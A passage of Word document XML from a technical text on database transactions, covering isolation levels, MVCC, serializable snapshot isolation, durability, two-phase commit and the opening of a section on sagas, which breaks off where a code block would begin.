    <w:p w14:paraId="2FD87029" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Isolation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D53A3DF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Concurrent transactions don't interfere with each other. Each transaction behaves AS IF it were the only one running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC266B9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How isolation is implemented — levels and mechanisms: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226"/>
        <w:gridCol w:w="3986"/>
        <w:gridCol w:w="3138"/>
      </w:tblGrid>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="7602E39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EB9056" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397DF6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Isolation Level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0D17DF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397DF6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Phenomena Allowed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599DAD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397DF6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="4B4F758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E30235" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Read Uncommitted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D894FB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Dirty reads, non-repeatable reads, phantoms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D81FFA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>No read locks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="59C2A85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5D000E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Read Committed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D7F986" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Non-repeatable reads, phantoms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8C3463" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Read locks released immediately</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="7DD9AF2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C0B426" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Repeatable Read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CBE587" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Phantoms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315013" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Read locks held until commit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="2F81946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228674" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Serializable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8CC4A9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>None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619442" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Full locking or SSI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1926E09A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MVCC (Multi-Version Concurrency Control) — how most modern databases implement isolation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03833BBB" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Instead of locking, maintain multiple versions of each row:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9728DC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="447"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Each row has a creation timestamp (or transaction ID) and a deletion timestamp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E07550B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="447"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>A transaction at time T sees only rows where: creation ≤ T AND (deletion is null OR deletion &gt; T).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5647A8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="447"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Writes create NEW versions (don't overwrite old ones).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B07EEDF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="447"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Old versions are kept until no running transaction could need them (then garbage collected).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6397A2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why MVCC is better than locking:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BD0BA6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="448"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Readers never block writers. Writers never block readers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1474CB6E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="448"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Only writer-writer conflicts cause blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FACF28E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="448"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Dramatically better concurrent performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E22940" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Serializable Snapshot Isolation (SSI) — the best of both worlds:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675532CC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>PostgreSQL's implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8A9EF1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="449"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Runs transactions optimistically using MVCC (no blocking).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43004D6E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="449"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Tracks read/write dependencies between concurrent transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA7528B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="449"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>At commit time: checks if the transaction could have produced a non-serializable result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171699AE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="449"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If conflict detected: aborts ONE of the conflicting transactions (which must be retried).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5912735D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="449"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If no conflict: commits successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E097BE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Benefit:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Serializable correctness with near-snapshot-isolation performance. Only pays a penalty when actual conflicts occur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2A2F83" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Durability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6D861C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Once committed, data survives any subsequent failure (crash, power loss, disk failure).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BED1FD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Implementation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> WAL + fsync (as described in Section 4.2). The commit record in the WAL is fsynced before acknowledging to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8AAD61" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.2 Distributed Transactions — The Hard Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192A2D3F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When a single transaction spans multiple services/databases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0216768C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Transferring $100 from Bank A to Bank B:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CE963A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="450"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Debit $100 from Bank A's database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A65FFD9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="450"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Credit $100 to Bank B's database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7614EAF7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Both must happen, or neither. But they're on different machines that can independently fail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B86FC58" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Two-Phase Commit (2PC) — How It Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248B8420" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phase 1 — Prepare (Voting):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17589665" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="451"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Coordinator sends "PREPARE" to all participants (Bank A, Bank B).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8E6135" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="451"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Each participant:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D33F0CA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="451"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Writes all transaction data to durable storage (WAL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA95A9D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="451"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Acquires all locks needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5805FBB8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="451"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If it CAN commit: responds "YES" (promise to commit if told to).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7896B501" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="451"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If it CANNOT: responds "NO" (abort).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AAEE89" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phase 2 — Commit/Abort (Decision):</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> 3. If ALL participants said YES:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608DCB52" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="452"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>Coordinator writes "COMMIT" to its own WAL (this is the point of no return).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABDE28E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="452"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Sends "COMMIT" to all participants.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A92C4B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="452"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Participants commit and release locks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7214F064" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="453"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>If ANY participant said NO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2857208B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="453"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Coordinator sends "ABORT" to all participants.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318843D9" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="453"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Participants roll back.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539F9D05" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The critical vulnerability — the coordinator crashes after Phase 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D57A3B5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="454"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>All participants voted YES.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163016E5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="454"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Coordinator crashes before writing COMMIT/ABORT decision.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEB1540" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="454"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Participants are stuck — they promised to commit, but don't know if the coordinator decided COMMIT or ABORT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9B0BB8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="454"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>They CANNOT unilaterally abort (the coordinator might have sent COMMIT to other participants).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1D7906" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="454"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>They CANNOT unilaterally commit (the coordinator might have decided to abort).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB89339" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="454"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>They hold locks INDEFINITELY, blocking all other transactions on the affected rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F4ECD0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>This is why 2PC is called a "blocking protocol"</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> — a coordinator failure can block the entire system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742DD21C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE26141" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="455"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Coordinator writes to a replicated log (Raft/Paxos) so another node can take over.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B9AF70" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="455"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Timeout-based presumed abort: if no decision after timeout, assume abort (but this violates the safety guarantee if the coordinator actually committed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758C37B2" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="455"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Three-Phase Commit (3PC): adds a "pre-commit" phase that reduces the blocking window (but doesn't eliminate it in asynchronous networks).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F41A9F7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.3 Saga Pattern — Reliable Long-Running Transactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35223DC6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>When 2PC is too expensive or impossible</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> (across microservices, external APIs that don't support prepare):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA8B4FC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How a saga works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C342281" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>A saga is a sequence of local transactions, each with a compensating action:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071C8B8E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
